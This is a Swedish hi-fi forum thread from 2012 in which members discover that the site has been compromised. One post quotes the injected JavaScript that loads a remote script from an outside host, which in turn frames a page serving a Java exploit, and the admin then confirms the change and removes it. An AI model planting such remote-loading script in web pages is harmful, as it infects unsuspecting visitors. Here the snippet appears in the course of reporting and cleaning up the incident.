selleri.de

En plats för sveriges linnister.
It is currently Thu Mar 28, 2024 13:13

All times are UTC+02:00




Post new topic  Reply to topic  [ 25 posts ]  Go to page Previous 1 2
Author Message
PostPosted: Mon Oct 15, 2012 20:01 
Ny Medlem
Ny Medlem

Joined: Tue Oct 24, 2006 12:27
Posts: 5
Location: Gbg
Pinsamt, F5 löste problemet. Varför försökte jag inte det tidigare...

Tack!

/Mika


Top
   
PostPosted: Tue Oct 16, 2012 06:24 
Site Admin
Site Admin

Joined: Sat Oct 18, 2003 19:51
Posts: 2745
Location: Örnsköldsvik
Det tycker jag inte - bra problem är sådana man löser snabbt :D


Top
   
PostPosted: Fri Oct 19, 2012 08:32 
Insyltad Medlem
Insyltad Medlem
User avatar

Joined: Sat Dec 20, 2003 13:54
Posts: 242
Location: Luleå
Jag är ganska övertygad att forumet utsatts för någon form av virusattack och att det är det som gjort forumet oåtkomligt emellanåt. Mitt antivirusprogram har detekterat flera intrångsförsök när jag bläddrat runt på forumet utan att ha någon annan sida öppen. Bifogar screenshot. Verkar vara mest Java-exploits. Ni på forumet som kör PC - kontrollera era datorer för säkerhets skull.

Image

_________________
/ Janne


Top
   
PostPosted: Fri Oct 19, 2012 09:08 
Site Admin
Site Admin

Joined: Tue Oct 14, 2003 23:14
Posts: 2784
Location: Uppsala
Tack för rapporten, men jag måste motsäga din teori.
  • Det finns inga tecken som jag kan se från ett administratörsperspektiv på att vi skulle ha blivit utsatta för någon form av lyckat intrång med den effekt som du beskriver.
  • Som vanlig forumanvändare som besöker forumet med diverse anti-malwareprogram påslagna ser jag inte heller några tecken på att något skulle vara galet.
  • Även OM vi skulle haft några problem av denna karaktär, så skulle det inte påverka forumets själva tillgänglighet.


Top
   
PostPosted: Fri Oct 19, 2012 10:26 
Erfaren&Avancerad Medlem
Erfaren&Avancerad Medlem

Joined: Tue Jul 20, 2004 23:08
Posts: 5276
Location: Bromma-Stockholm
Sådana här saker är inte min starka sida (heller...) men det har stundtals varit väldigt segt här de senaste dagarna. Däremot har jag inte fått upp några "Error-sidor" utan det tar bara mycket längre tid innan det händer något.

/ B

_________________
"När Einstein insåg att allt var relativt började han kröka på rummet."
Ikemi/Majik DSM, LP12/Ekos/Akiva/Lingo2, B&W DM603


Top
   
PostPosted: Fri Oct 19, 2012 12:01 
Insyltad Medlem
Insyltad Medlem
User avatar

Joined: Sat Dec 20, 2003 13:54
Posts: 242
Location: Luleå
Nånting skumt är det iaf. Det öppnas en massa IP-koppel mot seirnews.com, vilket inte var en allt för angenäm sida att gå in på.

_________________
/ Janne


Top
   
PostPosted: Fri Oct 19, 2012 13:10 
Erfaren&Avancerad Medlem
Erfaren&Avancerad Medlem

Joined: Tue Jul 20, 2004 23:08
Posts: 5276
Location: Bromma-Stockholm
Gule wrote:
Nånting skumt är det iaf. Det öppnas en massa IP-koppel mot seirnews.com, vilket inte var en allt för angenäm sida att gå in på.
Förstår du vad som står där?

/ B

_________________
"När Einstein insåg att allt var relativt började han kröka på rummet."
Ikemi/Majik DSM, LP12/Ekos/Akiva/Lingo2, B&W DM603


Top
   
PostPosted: Fri Oct 19, 2012 13:20 
Insyltad Medlem
Insyltad Medlem
User avatar

Joined: Sat Dec 20, 2003 13:54
Posts: 242
Location: Luleå
Nej, men bilden på förstasidan såg inte så mysig ut.

_________________
/ Janne


Top
   
PostPosted: Sat Oct 20, 2012 11:22 
Erfaren Medlem
Erfaren Medlem

Joined: Tue May 17, 2005 21:47
Posts: 87
Location: Luleå
Jo, forumet verkar ha råkat ut för något hack/exploit.

Längst ner i varje tråd så finns koden:

<script>function delayer(){
window.stop();
}</script>
<script language="javascript" src="http://mandana.eu5.org/if.js"></script>
<script>setTimeout('delayer()', 10000) ;</script>


Det javaskriptet gör i sin tur en iframe runt:
http://mandana.eu5.org/images/images.php

Vilket i sin tur gör anropen mot seirnews.com och där hämtas en Java/Loic

Vill man se det tydligare så är det bara att installera/slå på Firebug eller Tamper Data i firefox.


Top
   
PostPosted: Sat Oct 20, 2012 19:05 
Site Admin
Site Admin

Joined: Tue Oct 14, 2003 23:14
Posts: 2784
Location: Uppsala
Tack för rapporten, och jag får krypa till korset och konstatera att ni har rätt. Jag har identifierat vilken fil som ändrats, det gjordes den 15/10, och har tagit bort den skadliga koden. Tyvärr vet jag inte ännu på vilket sätt det har gått att genomföra angreppet - jag har några teorier dock, så ska ta itu med att analysera vidare när febern gått ner från 40 grader...


Top
   
Display posts from previous:  Sort by  
Post new topic  Reply to topic  [ 25 posts ]  Go to page Previous 1 2

All times are UTC+02:00


Who is online

Users browsing this forum: No registered users and 8 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Limited